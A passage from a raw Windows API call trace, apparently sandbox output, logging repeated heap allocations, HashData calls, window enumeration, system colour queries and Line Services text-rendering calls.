RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7e08 [0164.510] HashData (in: pbData=0x9f82f24, cbData=0x4, pbHash=0x9f82f28, cbHash=0x2 | out: pbHash=0x9f82f28) returned 0x0 [0164.642] HashData (in: pbData=0x6d7e08, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.642] HashData (in: pbData=0x6d7e0a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.642] HashData (in: pbData=0x6d7e0c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.642] HashData (in: pbData=0x6d7e14, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.642] HashData (in: pbData=0x6d7e1c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.642] HashData (in: pbData=0x6d7e24, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.642] HashData (in: pbData=0x6d7e26, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.642] HashData (in: pbData=0x6d7e28, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.643] HashData (in: pbData=0x6d7e30, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.643] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0164.643] HashData (in: pbData=0x6d7e3c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.643] HashData (in: pbData=0x6d7e44, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.643] HashData (in: pbData=0x6d7e50, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.643] HashData (in: pbData=0x6d7e54, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.643] HashData (in: pbData=0x6d7e5c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.643] HashData (in: pbData=0x6d7e68, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.643] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7e08 | out: hHeap=0x5e0000) returned 1 [0164.643] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0164.643] HashData (in: pbData=0x9ee6b60, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0164.643] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0164.643] HashData (in: pbData=0x9ee6b64, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0164.644] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6b60 | out: hHeap=0x5e0000) returned 1 [0164.644] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6a70 [0164.644] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83010 [0164.644] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0164.644] HashData (in: pbData=0x9f83014, cbData=0x4, pbHash=0x9f83018, cbHash=0x2 | out: pbHash=0x9f83018) returned 0x0 [0164.644] HashData (in: pbData=0x6d7a88, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.644] HashData (in: pbData=0x6d7a8a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.644] HashData (in: pbData=0x6d7a8c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.644] HashData (in: pbData=0x6d7a94, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.644] HashData (in: pbData=0x6d7a9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.644] HashData (in: pbData=0x6d7aa4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.644] HashData (in: pbData=0x6d7aa6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.644] HashData (in: pbData=0x6d7aa8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.644] HashData (in: pbData=0x6d7ab0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.644] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0164.644] HashData (in: pbData=0x6d7abc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.644] HashData (in: pbData=0x6d7ac4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.644] HashData (in: pbData=0x6d7ad0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.645] HashData (in: pbData=0x6d7ad4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.645] HashData (in: pbData=0x6d7adc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.645] HashData (in: pbData=0x6d7ae8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.645] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0164.645] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83010 | out: hHeap=0x5e0000) returned 1 [0164.645] HashData (in: pbData=0x9ee6a70, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0164.645] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0164.645] HashData (in: pbData=0x9ee6a74, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0164.645] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6a70 | out: hHeap=0x5e0000) returned 1 [0164.645] GetFocus () returned 0x0 [0164.645] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19795f) returned 0 [0164.645] GetFocus () returned 0x0 [0164.645] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19796b) returned 0 [0164.646] GetSysColor (nIndex=15) returned 0xf0f0f0 [0164.646] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7d28 | out: hHeap=0x5e0000) returned 1 [0164.646] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7af8 [0164.646] _CIsqrt () returned 0x407b027f [0164.646] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6b60 [0164.646] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.646] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.647] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6b60 | out: hHeap=0x5e0000) returned 1 [0164.647] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6dda18 [0164.647] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.647] HashData (in: pbData=0xd94bd0, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0164.648] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dda18 | out: hHeap=0x5e0000) returned 1 [0164.648] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6b70 [0164.648] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0164.648] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7e08 [0164.648] HashData (in: pbData=0x9f830a4, cbData=0x4, pbHash=0x9f830a8, cbHash=0x2 | out: pbHash=0x9f830a8) returned 0x0 [0164.648] HashData (in: pbData=0x6d7e08, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.648] HashData (in: pbData=0x6d7e0a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.648] HashData (in: pbData=0x6d7e0c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.648] HashData (in: pbData=0x6d7e14, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.648] HashData (in: pbData=0x6d7e1c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.648] HashData (in: pbData=0x6d7e24, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.649] HashData (in: pbData=0x6d7e26, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.649] HashData (in: pbData=0x6d7e28, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.649] HashData (in: pbData=0x6d7e30, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.649] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0164.649] HashData (in: pbData=0x6d7e3c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.649] HashData (in: pbData=0x6d7e44, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.649] HashData (in: pbData=0x6d7e50, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.649] HashData (in: pbData=0x6d7e54, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.649] HashData (in: pbData=0x6d7e5c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.649] HashData (in: pbData=0x6d7e68, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.649] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7e08 | out: hHeap=0x5e0000) returned 1 [0164.649] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0164.651] HashData (in: pbData=0x9ee6b70, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0164.652] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0164.652] HashData (in: pbData=0x9ee6b74, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0164.652] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6b70 | out: hHeap=0x5e0000) returned 1 [0164.652] GetFocus () returned 0x0 [0164.652] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197acf) returned 0 [0164.652] GetFocus () returned 0x0 [0164.652] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197a8b) returned 0 [0164.652] GetFocus () returned 0x0 [0164.653] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197a97) returned 0 [0164.653] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0164.653] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0164.653] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0164.653] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0164.653] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0164.653] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0164.654] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83118 [0164.654] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.654] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0164.654] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0164.654] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0164.654] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0164.654] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0164.654] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0164.655] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83130 [0164.656] GetSysColor (nIndex=15) returned 0xf0f0f0 [0164.656] GetSysColor (nIndex=15) returned 0xf0f0f0 [0164.657] GetSysColor (nIndex=15) returned 0xf0f0f0 [0164.657] GetSysColor (nIndex=15) returned 0xf0f0f0 [0164.657] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.658] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ef0 [0164.659] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83118 | out: hHeap=0x5e0000) returned 1 [0164.659] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83130 | out: hHeap=0x5e0000) returned 1 [0164.659] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ef0 | out: hHeap=0x5e0000) returned 1 [0164.659] LsSetDoc () returned 0x0 [0164.659] LsCreateLine () returned 0x0 [0164.660] LsDisplayLine () returned 0x0 [0164.662] LsDestroyLine () returned 0x0 [0164.662] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6b20 [0164.663] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83178 [0164.663] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0164.663] HashData (in: pbData=0x9f8317c, cbData=0x4, pbHash=0x9f83180, cbHash=0x2 | out: pbHash=0x9f83180) returned 0x0 [0164.663] HashData (in: pbData=0x6d7a88, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.663] HashData (in: pbData=0x6d7a8a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.663] HashData (in: pbData=0x6d7a8c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.663] HashData (in: pbData=0x6d7a94, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.663] HashData (in: pbData=0x6d7a9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.663] HashData (in: pbData=0x6d7aa4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.663] HashData (in: pbData=0x6d7aa6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.663] HashData (in: pbData=0x6d7aa8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.663] HashData (in: pbData=0x6d7ab0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.663] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0164.663] HashData (in: pbData=0x6d7abc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.663] HashData (in: pbData=0x6d7ac4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.663] HashData (in: pbData=0x6d7ad0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.663] HashData (in: pbData=0x6d7ad4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.663] HashData (in: pbData=0x6d7adc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.663] HashData (in: pbData=0x6d7ae8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.663] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0164.664] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83178 | out: hHeap=0x5e0000) returned 1 [0164.664] HashData (in: pbData=0x9ee6b20, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0164.664] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0164.664] HashData (in: pbData=0x9ee6b24, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0164.664] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6b20 | out: hHeap=0x5e0000) returned 1 [0164.664] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6a90 [0164.664] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83100 [0164.664] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0164.664] HashData (in: pbData=0x9f83104, cbData=0x4, pbHash=0x9f83108, cbHash=0x2 | out: pbHash=0x9f83108) returned 0x0 [0164.664] HashData (in: pbData=0x6d7a88, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.664] HashData (in: pbData=0x6d7a8a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.664] HashData (in: pbData=0x6d7a8c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.664] HashData (in: pbData=0x6d7a94, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.664] HashData (in: pbData=0x6d7a9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.664] HashData (in: pbData=0x6d7aa4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.664] HashData (in: pbData=0x6d7aa6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.665] HashData (in: pbData=0x6d7aa8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.665] HashData (in: pbData=0x6d7ab0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.665] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0164.665] HashData (in: pbData=0x6d7abc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.665] HashData (in: pbData=0x6d7ac4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.665] HashData (in: pbData=0x6d7ad0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.665] HashData (in: pbData=0x6d7ad4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.665] HashData (in: pbData=0x6d7adc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.665] HashData (in: pbData=0x6d7ae8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.665] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0164.665] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83100 | out: hHeap=0x5e0000) returned 1 [0164.665] HashData (in: pbData=0x9ee6a90, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0164.665] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0164.666] HashData (in: pbData=0x9ee6a94, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0164.666] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6a90 | out: hHeap=0x5e0000) returned 1 [0164.667] GetSysColor (nIndex=15) returned 0xf0f0f0 [0164.667] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7af8 | out: hHeap=0x5e0000) returned 1 [0164.667] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7af8 [0164.667] _CIsqrt () returned 0x407b027f [0164.667] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6bd0 [0164.667] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.667] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.668] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6bd0 | out: hHeap=0x5e0000) returned 1 [0164.668] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6dd838 [0164.668] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.668] HashData (in: pbData=0xd94c30, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0164.669] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dd838 | out: hHeap=0x5e0000) returned 1 [0164.669] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6b30 [0164.669] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83118 [0164.669] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0164.669] HashData (in: pbData=0x9f8311c, cbData=0x4, pbHash=0x9f83120, cbHash=0x2 | out: pbHash=0x9f83120) returned 0x0 [0164.669] HashData (in: pbData=0x6d7a88, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.669] HashData (in: pbData=0x6d7a8a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.669] HashData (in: pbData=0x6d7a8c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.669] HashData (in: pbData=0x6d7a94, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.669] HashData (in: pbData=0x6d7a9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.669] HashData (in: pbData=0x6d7aa4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.669] HashData (in: pbData=0x6d7aa6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.670] HashData (in: pbData=0x6d7aa8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.670] HashData (in: pbData=0x6d7ab0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.670] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0164.670] HashData (in: pbData=0x6d7abc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.670] HashData (in: pbData=0x6d7ac4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.670] HashData (in: pbData=0x6d7ad0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.670] HashData (in: pbData=0x6d7ad4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.670] HashData (in: pbData=0x6d7adc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0164.670] HashData (in: pbData=0x6d7ae8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0164.670] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0164.670] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83118 | out: hHeap=0x5e0000) returned 1 [0164.670] HashData (in: pbData=0x9ee6b30, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0164.670] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0164.670] HashData (in: pbData=0x9ee6b34, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0164.670] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6b30 | out: hHeap=0x5e0000) returned 1 [0164.670] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0164.670] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0164.670] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0164.670] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0164.671] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0164.671] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0164.671] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83010 [0164.672] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.672] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0164.672] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0164.672] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0164.672] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0164.672] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0164.672] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0164.675] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830e8 [0164.675] GetSysColor (nIndex=15) returned 0xf0f0f0 [0164.676] GetSysColor (nIndex=15) returned 0xf0f0f0 [0164.676] GetSysColor (nIndex=15) returned 0xf0f0f0 [0164.677] GetSysColor (nIndex=15) returned 0xf0f0f0 [0164.677] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.677] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fe0 [0164.678] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83010 | out: hHeap=0x5e0000) returned 1 [0164.678] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830e8 | out: hHeap=0x5e0000) returned 1 [0164.678] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fe0 | out: hHeap=0x5e0000) returned 1 [0164.678] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, 